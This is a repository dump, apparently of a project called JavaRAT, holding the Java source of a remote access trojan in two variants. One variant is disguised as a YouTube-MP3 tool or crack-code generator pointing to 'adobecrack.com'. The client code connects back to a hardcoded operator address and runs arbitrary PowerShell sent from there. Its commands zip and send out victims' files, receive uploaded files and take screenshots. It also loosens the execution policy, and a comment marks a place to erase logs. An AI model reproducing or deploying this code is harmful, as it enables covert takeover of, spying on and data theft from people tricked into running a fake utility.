104 | versionPanel.setBackground(Color.white);
105 |
106 | versionPanel.add(Box.createRigidArea(new Dimension(10, 0)));
107 |
108 | JLabel version = new JLabel("v 1.6");
109 | version.setFont(new Font(null, Font.PLAIN, 12));
110 | versionPanel.add(version);
111 | mainPanel.add(versionPanel, BorderLayout.PAGE_END);
112 |
113 | versionPanel.add(Box.createRigidArea(new Dimension(10, 0)));
114 |
115 | JSeparator sep = new JSeparator(SwingConstants.VERTICAL);
116 | sep.setPreferredSize(new Dimension(20, 10));
117 | sep.setMaximumSize(new Dimension(20, 10));
118 | sep.setMinimumSize(new Dimension(20, 10));
119 | versionPanel.add(sep);
120 |
121 | JLabel info = new JLabel("More info at https://adobecrack.com");
122 | info.setFont(new Font(null, Font.PLAIN, 12));
123 | versionPanel.add(info);
124 |
125 | this.setContentPane(mainPanel);
126 | this.setVisible(true);
127 | this.setSize(500, 280);
128 | this.setResizable(false);
129 | this.setLocationRelativeTo(null);
130 | }
131 |
132 | private String generateCode() {
133 | String code = "";
134 | Random rand = new Random();
135 | int next;
136 |
137 | for(int i = 0; i < 6; i++) {
138 | for(int j = 0; j < 4; j++) {
139 | next = rand.nextInt(15) + 1;
140 | if(next == 10) {
141 | code += "A";
142 | }
143 | else if(next == 11){
144 | code += "B";
145 | }
146 | else if(next == 12){
147 | code += "C";
148 | }
149 | else if(next == 13){
150 | code += "D";
151 | }
152 | else if(next == 14){
153 | code += "E";
154 | }
155 | else if(next == 15){
156 | code += "F";
157 | }
158 | else {
159 | code += String.valueOf(next);
160 | }
161 | }
162 | if(i < 5) {
163 | code += " ";
164 | }
165 | }
166 |
167 | return code;
168 | }
169 | }
170 |
--------------------------------------------------------------------------------
/Victim [RAW]/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [RAW]/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/Victim [RAW]/lib/jPowerShell-3.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [RAW]/lib/jPowerShell-3.1.1.jar
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/Command.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public abstract class Command {
8 | protected String _commandName;
9 |
10 | public Command(String commandName) {
11 | _commandName = commandName;
12 | }
13 |
14 | public abstract void execute(Controller ctrl) throws IOException;
15 |
16 | protected boolean parse(String command) {
17 | return _commandName.equals(command);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/CommandManager.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class CommandManager {
8 | private static Command[] commands = {new EndCommand(), new GetCommand(), new SendCommand(), new ScreenShotCommand()};
9 |
10 | public static void parseCommand(String command, Controller ctrl) throws IOException {
11 | boolean parsed = false;
12 | int i = 0;
13 |
14 | while(!parsed && i < commands.length) {
15 | try {
16 | if(commands[i].parse(command)) {
17 | commands[i].execute(ctrl);
18 | parsed = true;
19 | }
20 | }catch(IllegalArgumentException e) {
21 | ctrl.sendMsg("Please, input a valid command >:(\nType help for more info");
22 | parsed = true;
23 | }
24 | i++;
25 | }
26 | if(!parsed) {
27 | ctrl.sendMsg(ctrl.execute(command));
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/EndCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class EndCommand extends Command{
8 |
9 | public EndCommand() {
10 | super("endcon");
11 | }
12 |
13 | @Override
14 | public void execute(Controller ctrl) throws IOException {
15 | ctrl.sendMsg("Bye :(\n\n");
16 | ctrl.endConnection();
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/GetCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.io.IOException;
7 | import java.util.ArrayList;
8 | import java.util.List;
9 | import java.util.zip.ZipEntry;
10 | import java.util.zip.ZipException;
11 | import java.util.zip.ZipOutputStream;
12 |
13 | import connection.Controller;
14 |
15 | public class GetCommand extends Command{
16 | private String _fileName;
17 | private List fileList;
18 |
19 | public GetCommand() {
20 | super("get");
21 | fileList = new ArrayList();
22 | }
23 |
24 | protected boolean parse(String command) {
25 | boolean ok = false;
26 |
27 | if(command.contains(_commandName)) {
28 | try {
29 | _fileName = command.split("\"")[1];
30 | }catch(Exception e) {
31 | throw new IllegalArgumentException();
32 | }
33 | ok = true;
34 | }
35 |
36 | return ok;
37 | }
38 |
39 | @Override
40 | public void execute(Controller ctrl) throws IOException {
41 | String path = ctrl.execute("Get-Item '" + _fileName + "' | Select-Object FullName | Format-List");
42 |
43 | File fileToCompress = new File(fetch(path));
44 | if(fileToCompress.exists()) {
45 | File fileCompressed = compress(fileToCompress, ctrl);
46 | if(fileCompressed.exists()) {
47 | ctrl.sendFile(fileCompressed);
48 | fileCompressed.delete();
49 | }
50 | } else {
51 | ctrl.sendMsg("The specified file/dir does not exists");
52 | }
53 | }
54 |
55 | private File compress(File fileToCompress, Controller ctrl){
56 | byte[] buffer = new byte[1024];
57 |
58 | try{
59 | String path = fileToCompress.getAbsolutePath();
60 | String zipPath = path + ".zip";
61 |
62 | FileOutputStream fos = new FileOutputStream(zipPath);
63 | ZipOutputStream zos = new ZipOutputStream(fos);
64 |
65 | if(fileToCompress.isFile()) {
66 | ZipEntry ze= new ZipEntry(_fileName);
67 | zos.putNextEntry(ze);
68 | FileInputStream in = new FileInputStream(path);
69 |
70 | int len;
71 | while ((len = in.read(buffer)) > 0) {
72 | zos.write(buffer, 0, len);
73 | }
74 |
75 | in.close();
76 |
77 | }
78 | else {
79 | generateFileList(fileToCompress);
80 |
81 | for(File file : fileList){
82 | try {
83 | ZipEntry ze= new ZipEntry(file.getName());
84 | zos.putNextEntry(ze);
85 | FileInputStream in = new FileInputStream(file.getAbsolutePath());
86 |
87 | int len;
88 | while ((len = in.read(buffer)) > 0) {
89 | zos.write(buffer, 0, len);
90 | }
91 | in.close();
92 | }catch(ZipException ex){
93 | //weird zip format exception when compressing some xml files
94 | }
95 | }
96 | }
97 | zos.closeEntry();
98 | zos.close();
99 | fos.close();
100 | ctrl.sendMsg("File compressed");
101 |
102 | return new File(zipPath);
103 | }catch(Exception e) {
104 | ctrl.sendMsg(e.getStackTrace().toString() + " " + e.getMessage());
105 | return null;
106 | }
107 | }
108 |
109 | private void generateFileList(File node){
110 | //add file only
111 | if(node.isFile()){
112 | fileList.add(node);
113 | }
114 | else if(node.isDirectory()){
115 | String[] subNote = node.list();
116 | for(String filename : subNote){
117 | generateFileList(new File(node, filename));
118 | }
119 | }
120 | }
121 |
122 | private static String fetch(String str) {
123 | boolean exit = false;
124 | int first = 0, i = 0;
125 |
126 | exit = false;
127 | while(i < str.length() && !exit) {
128 | char aux = str.charAt(i);
129 | if(aux == ':') {
130 | first = i;
131 | exit = true;
132 | }
133 | i++;
134 | }
135 |
136 | return str.substring(first + 2, str.length());
137 | }
138 |
139 | }
140 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/ScreenShotCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Controller;
7 |
8 | public class ScreenShotCommand extends Command{
9 |
10 | public ScreenShotCommand() {
11 | super("screenshot");
12 | }
13 |
14 | @Override
15 | public void execute(Controller ctrl) throws IOException {
16 | ctrl.receiveFile("Take-ScreenShot.ps1");
17 | // ESTO ES LO Q HACE Q NO FUNCIONE NADA :/
18 | ctrl.execute(". .\\Take-ScreenShot.ps1");
19 | String path = ctrl.execute("Get-Location");
20 | path = path.split("\n")[3];
21 | path = path + "\\";
22 | path = path.replace("[", "`[");
23 | path = path.replace("]", "`]");
24 | ctrl.execute("Take-ScreenShot -file \"" + path + "screenshot.png\"");
25 | ctrl.sendMsg("Screenshot taken");
26 | File screenshot = new File("screenshot.png");
27 | ctrl.sendFile(screenshot);
28 | ctrl.execute("rm screenshot.png");
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/commands/SendCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class SendCommand extends Command{
8 | private String _fileName;
9 |
10 | public SendCommand() {
11 | super("send");
12 | }
13 |
14 | protected boolean parse(String command) {
15 | boolean ok = false;
16 |
17 | if(command.contains(_commandName)) {
18 | try {
19 | _fileName = command.split("\"")[1];
20 | }catch(Exception e) {
21 | throw new IllegalArgumentException();
22 | }
23 | ok = true;
24 | }
25 |
26 | return ok;
27 | }
28 |
29 | @Override
30 | public void execute(Controller ctrl) throws IOException {
31 | ctrl.receiveFile(_fileName);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/connection/Client.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.BufferedOutputStream;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.OutputStream;
13 | import java.net.Socket;
14 |
15 | public class Client {
16 | private Socket s;
17 | private String _ip;
18 | private int _port;
19 | private DataOutputStream dout;
20 | private DataInputStream din;
21 |
22 | public Client(String hostIP, int port) {
23 | _ip = hostIP;
24 | _port = port;
25 | }
26 |
27 | public boolean isClosed() {
28 | return s.isClosed();
29 | }
30 |
31 | public void send(String msg) throws IOException {
32 | dout.writeUTF(msg);
33 | dout.flush();
34 | }
35 |
36 | public void sendFile(File file) throws IOException {
37 | // Auth to identify as a sender socket
38 | send(file.getName());
39 |
40 | int lenght = (int) file.length();
41 | send(String.valueOf(lenght));
42 |
43 | byte [] mybytearray = new byte [(int)file.length()];
44 |
45 | InputStream in = new FileInputStream(file);
46 | BufferedInputStream bin = new BufferedInputStream(in);
47 | OutputStream out = s.getOutputStream();
48 |
49 | bin.read(mybytearray, 0, mybytearray.length);
50 | out.write(mybytearray,0, mybytearray.length);
51 |
52 | //out.close() directly shuts down the socket
53 | out.close();
54 | in.close();
55 | bin.close();
56 | }
57 |
58 | public String receive() throws IOException {
59 | return din.readUTF();
60 | }
61 |
62 | public void receiveFile(String path) throws IOException {
63 | InputStream is;
64 | DataInputStream din;
65 | FileOutputStream out;
66 | BufferedOutputStream bos;
67 |
68 | //Auth to identify as a receiver socket
69 | send("iwtraf :(");
70 |
71 | try {
72 | is = s.getInputStream();
73 | din = new DataInputStream(is);
74 | out = new FileOutputStream(new File(path));
75 | bos = new BufferedOutputStream(out);
76 | } catch(IOException e) {
77 | send("Error: There was a problem initializing the transfer");
78 | throw e;
79 | }
80 | try {
81 | //Server sends length of file
82 | int length = Integer.valueOf(din.readUTF());
83 | byte [] mybytearray = new byte [length];
84 |
85 | send("Sending " + path + " (" + length + " bytes)");
86 |
87 | //is.read tries to read up to length, but may read less
88 | int bytesRead = is.read(mybytearray, 0, length);
89 | int current = bytesRead;
90 |
91 | while (current != length) {
92 | send(current + "/" + length);
93 | bytesRead = is.read(mybytearray, current, (length - current));
94 | if(bytesRead >= 0) {
95 | current += bytesRead;
96 | }
97 | }
98 |
99 | bos.write(mybytearray, 0 , length);
100 | bos.flush();
101 |
102 | send("Transfer completed");
103 | }catch(IOException e) {
104 | send("Error: The transfer couldn't be completed");
105 | }
106 |
107 | is.close();
108 | out.close();
109 | bos.close();
110 | }
111 |
112 | public void end() throws IOException {
113 | s.close();
114 | }
115 |
116 | public void connect() throws IOException {
117 | reset();
118 | dout.writeUTF("hello");
119 | }
120 |
121 | public void reset() throws IOException {
122 | while(!initConnection());
123 | System.gc(); //Calls the garbage collector because of the previous function
124 | dout = new DataOutputStream(s.getOutputStream());
125 | din = new DataInputStream(s.getInputStream());
126 | }
127 |
128 | private boolean initConnection() {
129 | try{
130 | s = new Socket(_ip,_port);
131 | return true;
132 | }
133 | catch(Exception err){
134 | return false;
135 | }
136 | }
137 | }
138 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/connection/Controller.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import com.profesorfalken.jpowershell.PowerShell;
7 | import com.profesorfalken.jpowershell.PowerShellResponse;
8 |
9 | import commands.CommandManager;
10 |
11 | public class Controller {
12 | private PowerShell powerShell;
13 | private Client client;
14 | private String _ip;
15 | private int _port;
16 |
17 | public Controller(String ip, int port) {
18 | _ip = ip;
19 | _port = port;
20 | client = new Client(ip, port);
21 | setUpPowerShellSession();
22 | }
23 |
24 | public void run() {
25 | try {
26 | connect();
27 | } catch (IOException e) {
28 | return;
29 | }
30 | while(!client.isClosed()) {
31 | try {
32 | CommandManager.parseCommand(client.receive().trim(), this);
33 | } catch (IOException e1) {
34 | try {
35 | connect();
36 | }
37 | catch(IOException e2) {
38 | return;
39 | }
40 | }
41 | }
42 | }
43 |
44 | public String receiveMsg() throws IOException {
45 | return client.receive();
46 | }
47 |
48 | public void sendMsg(String message) {
49 | try {
50 | client.send(message);
51 | } catch (IOException e) {
52 | endConnection();
53 | }
54 | }
55 |
56 | public void receiveFile(String fileName) {
57 | Thread t = new Thread() {
58 | public void run() {
59 | try {
60 | String path = execute("Get-Location");
61 | path = path.split("\n")[3];
62 | path = path + "\\" + fileName;
63 |
64 | Client temporary = new Client(_ip, _port);
65 | temporary.reset();
66 | temporary.receiveFile(path);
67 | temporary.end();
68 | }
69 | catch(IOException e) {}
70 | }
71 | };
72 | t.start();
73 | try{t.join();} catch (InterruptedException e) {}
74 | }
75 |
76 | public void sendFile(File file) throws IOException {
77 | Thread t = new Thread() {
78 | public void run() {
79 | try {
80 | Client temporary = new Client(_ip, _port);
81 | temporary.reset();
82 | temporary.sendFile(file);
83 | temporary.end();
84 | }catch(IOException e) {}
85 | }
86 | };
87 |
88 | t.start();
89 | try {t.join();} catch (InterruptedException e) {}
90 | }
91 |
92 | public String execute(String command) {
93 | try {
94 | PowerShellResponse response = powerShell.executeCommand(command);
95 | return response.getCommandOutput();
96 | } catch (Exception e) {
97 | endConnection();
98 | return null;
99 | }
100 | }
101 |
102 | public void endConnection(){
103 | powerShell.close();
104 | try {
105 | client.end();
106 | } catch (IOException e) {} finally{
107 | //Borrar powerShell logs
108 | }
109 | }
110 |
111 | private void connect() throws IOException {
112 | client.connect();
113 | }
114 |
115 | private void setUpPowerShellSession() {
116 | powerShell = PowerShell.openSession();
117 |
118 | powerShell.executeCommand("Set-ExecutionPolicy Unrestricted -Scope Process");
119 |
120 | String path = System.getProperty("java.class.path").split(";")[0];
121 | path = path.substring(0, path.length() - 4);
122 | path = path.replace("[", "`[");
123 | path = path.replace("]", "`]");
124 | powerShell.executeCommand("cd '" + path + "'");
125 | }
126 | }
127 |
--------------------------------------------------------------------------------
/Victim [RAW]/src/launcher/Main.java:
--------------------------------------------------------------------------------
1 | package launcher;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class Main {
8 | public static void main(String[] args) throws IOException {
9 | //Controller ctrl = new Controller("0.tcp.ngrok.io", 14235);
10 | Controller ctrl = new Controller("192.168.0.162", 5123);
11 | ctrl.run();
12 | }
13 | }
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [YoutubeMP3]/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/lib/jPowerShell-3.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [YoutubeMP3]/lib/jPowerShell-3.1.1.jar
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/Command.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public abstract class Command {
8 | protected String _commandName;
9 |
10 | public Command(String commandName) {
11 | _commandName = commandName;
12 | }
13 |
14 | public abstract void execute(Controller ctrl) throws IOException;
15 |
16 | protected boolean parse(String command) {
17 | return _commandName.equals(command);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/CommandManager.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class CommandManager {
8 | private static Command[] commands = {new EndCommand(), new GetCommand(), new SendCommand(), new ScreenShotCommand()};
9 |
10 | public static void parseCommand(String command, Controller ctrl) throws IOException {
11 | boolean parsed = false;
12 | int i = 0;
13 |
14 | while(!parsed && i < commands.length) {
15 | try {
16 | if(commands[i].parse(command)) {
17 | commands[i].execute(ctrl);
18 | parsed = true;
19 | }
20 | }catch(IllegalArgumentException e) {
21 | ctrl.sendMsg("Please, input a valid command >:(\nType help for more info");
22 | parsed = true;
23 | }
24 | i++;
25 | }
26 | if(!parsed) {
27 | ctrl.sendMsg(ctrl.execute(command));
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/EndCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class EndCommand extends Command{
8 |
9 | public EndCommand() {
10 | super("endcon");
11 | }
12 |
13 | @Override
14 | public void execute(Controller ctrl) throws IOException {
15 | ctrl.sendMsg("Bye :(\n\n");
16 | ctrl.endConnection();
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/GetCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.io.IOException;
7 | import java.util.ArrayList;
8 | import java.util.List;
9 | import java.util.zip.ZipEntry;
10 | import java.util.zip.ZipException;
11 | import java.util.zip.ZipOutputStream;
12 |
13 | import connection.Controller;
14 |
15 | public class GetCommand extends Command{
16 | private String _fileName;
17 | private List fileList;
18 |
19 | public GetCommand() {
20 | super("get");
21 | fileList = new ArrayList();
22 | }
23 |
24 | protected boolean parse(String command) {
25 | boolean ok = false;
26 |
27 | if(command.contains(_commandName)) {
28 | try {
29 | _fileName = command.split("\"")[1];
30 | }catch(Exception e) {
31 | throw new IllegalArgumentException();
32 | }
33 | ok = true;
34 | }
35 |
36 | return ok;
37 | }
38 |
39 | @Override
40 | public void execute(Controller ctrl) throws IOException {
41 | String path = ctrl.execute("Get-Item '" + _fileName + "' | Select-Object FullName | Format-List");
42 |
43 | File fileToCompress = new File(fetch(path));
44 | if(fileToCompress.exists()) {
45 | File fileCompressed = compress(fileToCompress, ctrl);
46 | if(fileCompressed.exists()) {
47 | ctrl.sendFile(fileCompressed);
48 | fileCompressed.delete();
49 | }
50 | } else {
51 | ctrl.sendMsg("The specified file/dir does not exists");
52 | }
53 | }
54 |
55 | private File compress(File fileToCompress, Controller ctrl){
56 | byte[] buffer = new byte[1024];
57 |
58 | try{
59 | String path = fileToCompress.getAbsolutePath();
60 | String zipPath = path + ".zip";
61 |
62 | FileOutputStream fos = new FileOutputStream(zipPath);
63 | ZipOutputStream zos = new ZipOutputStream(fos);
64 |
65 | if(fileToCompress.isFile()) {
66 | ZipEntry ze= new ZipEntry(_fileName);
67 | zos.putNextEntry(ze);
68 | FileInputStream in = new FileInputStream(path);
69 |
70 | int len;
71 | while ((len = in.read(buffer)) > 0) {
72 | zos.write(buffer, 0, len);
73 | }
74 |
75 | in.close();
76 |
77 | }
78 | else {
79 | generateFileList(fileToCompress);
80 |
81 | for(File file : fileList){
82 | try {
83 | ZipEntry ze= new ZipEntry(file.getName());
84 | zos.putNextEntry(ze);
85 | FileInputStream in = new FileInputStream(file.getAbsolutePath());
86 |
87 | int len;
88 | while ((len = in.read(buffer)) > 0) {
89 | zos.write(buffer, 0, len);
90 | }
91 | in.close();
92 | }catch(ZipException ex){
93 | //weird zip format exception when compressing some xml files
94 | }
95 | }
96 | }
97 | zos.closeEntry();
98 | zos.close();
99 | fos.close();
100 | ctrl.sendMsg("File compressed");
101 |
102 | return new File(zipPath);
103 | }catch(Exception e) {
104 | ctrl.sendMsg(e.getStackTrace().toString() + " " + e.getMessage());
105 | return null;
106 | }
107 | }
108 |
109 | private void generateFileList(File node){
110 | //add file only
111 | if(node.isFile()){
112 | fileList.add(node);
113 | }
114 | else if(node.isDirectory()){
115 | String[] subNote = node.list();
116 | for(String filename : subNote){
117 | generateFileList(new File(node, filename));
118 | }
119 | }
120 | }
121 |
122 | private static String fetch(String str) {
123 | boolean exit = false;
124 | int first = 0, i = 0;
125 |
126 | exit = false;
127 | while(i < str.length() && !exit) {
128 | char aux = str.charAt(i);
129 | if(aux == ':') {
130 | first = i;
131 | exit = true;
132 | }
133 | i++;
134 | }
135 |
136 | return str.substring(first + 2, str.length());
137 | }
138 |
139 | }
140 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/ScreenShotCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Controller;
7 |
8 | public class ScreenShotCommand extends Command{
9 |
10 | public ScreenShotCommand() {
11 | super("screenshot");
12 | }
13 |
14 | @Override
15 | public void execute(Controller ctrl) throws IOException {
16 | // Current PowerShell script does not work properly :(
17 | ctrl.receiveFile("Take-ScreenShot.ps1");
18 | ctrl.execute(". .\\Take-ScreenShot.ps1");
19 | String path = ctrl.execute("Get-Location");
20 | path = path.split("\n")[3];
21 | path = path + "\\";
22 | path = path.replace("[", "`[");
23 | path = path.replace("]", "`]");
24 | ctrl.execute("Take-ScreenShot -file \"" + path + "screenshot.png\"");
25 | ctrl.sendMsg("Screenshot taken");
26 | File screenshot = new File("screenshot.png");
27 | ctrl.sendFile(screenshot);
28 | ctrl.execute("rm screenshot.png");
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/commands/SendCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class SendCommand extends Command{
8 | private String _fileName;
9 |
10 | public SendCommand() {
11 | super("send");
12 | }
13 |
14 | protected boolean parse(String command) {
15 | boolean ok = false;
16 |
17 | if(command.contains(_commandName)) {
18 | try {
19 | _fileName = command.split("\"")[1];
20 | }catch(Exception e) {
21 | throw new IllegalArgumentException();
22 | }
23 | ok = true;
24 | }
25 |
26 | return ok;
27 | }
28 |
29 | @Override
30 | public void execute(Controller ctrl) throws IOException {
31 | ctrl.receiveFile(_fileName);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/connection/Client.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.BufferedOutputStream;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.OutputStream;
13 | import java.net.Socket;
14 |
15 | public class Client {
16 | private Socket s;
17 | private String _ip;
18 | private int _port;
19 | private DataOutputStream dout;
20 | private DataInputStream din;
21 |
22 | public Client(String hostIP, int port) {
23 | _ip = hostIP;
24 | _port = port;
25 | }
26 |
27 | public boolean isClosed() {
28 | return s.isClosed();
29 | }
30 |
31 | public void send(String msg) throws IOException {
32 | dout.writeUTF(msg);
33 | dout.flush();
34 | }
35 |
36 | public void sendFile(File file) throws IOException {
37 | // Auth to identify as a sender socket
38 | send(file.getName());
39 |
40 | int lenght = (int) file.length();
41 | send(String.valueOf(lenght));
42 |
43 | byte [] mybytearray = new byte [(int)file.length()];
44 |
45 | InputStream in = new FileInputStream(file);
46 | BufferedInputStream bin = new BufferedInputStream(in);
47 | OutputStream out = s.getOutputStream();
48 |
49 | bin.read(mybytearray, 0, mybytearray.length);
50 | out.write(mybytearray,0, mybytearray.length);
51 |
52 | //out.close() directly shuts down the socket
53 | out.close();
54 | in.close();
55 | bin.close();
56 | }
57 |
58 | public String receive() throws IOException {
59 | return din.readUTF();
60 | }
61 |
62 | public void receiveFile(String path) throws IOException {
63 | InputStream is;
64 | DataInputStream din;
65 | FileOutputStream out;
66 | BufferedOutputStream bos;
67 |
68 | //Auth to identify as a receiver socket
69 | send("iwtraf :(");
70 |
71 | try {
72 | is = s.getInputStream();
73 | din = new DataInputStream(is);
74 | out = new FileOutputStream(new File(path));
75 | bos = new BufferedOutputStream(out);
76 | } catch(IOException e) {
77 | send("Error: There was a problem initializing the transfer");
78 | throw e;
79 | }
80 | try {
81 | //Server sends length of file
82 | int length = Integer.valueOf(din.readUTF());
83 | byte [] mybytearray = new byte [length];
84 |
85 | send("Sending " + path + " (" + length + " bytes)");
86 |
87 | //is.read tries to read up to length, but may read less
88 | int bytesRead = is.read(mybytearray, 0, length);
89 | int current = bytesRead;
90 |
91 | while (current != length) {
92 | send(current + "/" + length);
93 | bytesRead = is.read(mybytearray, current, (length - current));
94 | if(bytesRead >= 0) {
95 | current += bytesRead;
96 | }
97 | }
98 |
99 | bos.write(mybytearray, 0 , length);
100 | bos.flush();
101 |
102 | send("Transfer completed");
103 | }catch(IOException e) {
104 | send("Error: The transfer couldn't be completed");
105 | }
106 |
107 | is.close();
108 | out.close();
109 | bos.close();
110 | }
111 |
112 | public void end() throws IOException {
113 | s.close();
114 | }
115 |
116 | public void connect() throws IOException {
117 | reset();
118 | dout.writeUTF("hello");
119 | }
120 |
121 | public void reset() throws IOException {
122 | while(!initConnection());
123 | System.gc(); //Calls the garbage collector because of the previous function
124 | dout = new DataOutputStream(s.getOutputStream());
125 | din = new DataInputStream(s.getInputStream());
126 | }
127 |
128 | private boolean initConnection() {
129 | try{
130 | s = new Socket(_ip,_port);
131 | return true;
132 | }
133 | catch(Exception err){
134 | return false;
135 | }
136 | }
137 | }
138 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/connection/Controller.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import com.profesorfalken.jpowershell.PowerShell;
7 | import com.profesorfalken.jpowershell.PowerShellResponse;
8 |
9 | import commands.CommandManager;
10 |
11 | public class Controller {
12 | private PowerShell powerShell;
13 | private Client client;
14 | private String _ip;
15 | private int _port;
16 |
17 | public Controller(String ip, int port) {
18 | _ip = ip;
19 | _port = port;
20 | client = new Client(ip, port);
21 | setUpPowerShellSession();
22 | }
23 |
24 | public void run() {
25 | try {
26 | connect();
27 | } catch (IOException e) {
28 | return;
29 | }
30 | while(!client.isClosed()) {
31 | try {
32 | CommandManager.parseCommand(client.receive().trim(), this);
33 | } catch (IOException e1) {
34 | try {
35 | connect();
36 | }
37 | catch(IOException e2) {
38 | return;
39 | }
40 | }
41 | }
42 | }
43 |
44 | public String receiveMsg() throws IOException {
45 | return client.receive();
46 | }
47 |
48 | public void sendMsg(String message) {
49 | try {
50 | client.send(message);
51 | } catch (IOException e) {
52 | endConnection();
53 | }
54 | }
55 |
56 | public void receiveFile(String fileName) {
57 | Thread t = new Thread() {
58 | public void run() {
59 | try {
60 | String path = execute("Get-Location");
61 | path = path.split("\n")[3];
62 | path = path + "\\" + fileName;
63 |
64 | Client temporary = new Client(_ip, _port);
65 | temporary.reset();
66 | temporary.receiveFile(path);
67 | temporary.end();
68 | }
69 | catch(IOException e) {}
70 | }
71 | };
72 | t.start();
73 | try{t.join();} catch (InterruptedException e) {}
74 | }
75 |
76 | public void sendFile(File file) throws IOException {
77 | Thread t = new Thread() {
78 | public void run() {
79 | try {
80 | Client temporary = new Client(_ip, _port);
81 | temporary.reset();
82 | temporary.sendFile(file);
83 | temporary.end();
84 | }catch(IOException e) {}
85 | }
86 | };
87 |
88 | t.start();
89 | try {t.join();} catch (InterruptedException e) {}
90 | }
91 |
92 | public String execute(String command) {
93 | try {
94 | PowerShellResponse response = powerShell.executeCommand(command);
95 | return response.getCommandOutput();
96 | } catch (Exception e) {
97 | endConnection();
98 | return null;
99 | }
100 | }
101 |
102 | public void endConnection(){
103 | powerShell.close();
104 | try {
105 | client.end();
106 | } catch (IOException e) {} finally{
107 | //Borrar powerShell logs
108 | }
109 | }
110 |
111 | private void connect() throws IOException {
112 | client.connect();
113 | }
114 |
115 | private void setUpPowerShellSession() {
116 | powerShell = PowerShell.openSession();
117 |
118 | powerShell.executeCommand("Set-ExecutionPolicy Unrestricted -Scope Process");
119 |
120 | String path = System.getProperty("java.class.path").split(";")[0];
121 | path = path.substring(0, path.length() - 4);
122 | path = path.replace("[", "`[");
123 | path = path.replace("]", "`]");
124 | powerShell.executeCommand("cd '" + path + "'");
125 | }
126 | }
127 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/launcher/Main.java:
--------------------------------------------------------------------------------
1 | package launcher;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 | import view.MainWindow;
7 |
8 | public class Main {
9 | public static void main(String[] args) throws IOException {
10 | new MainWindow();
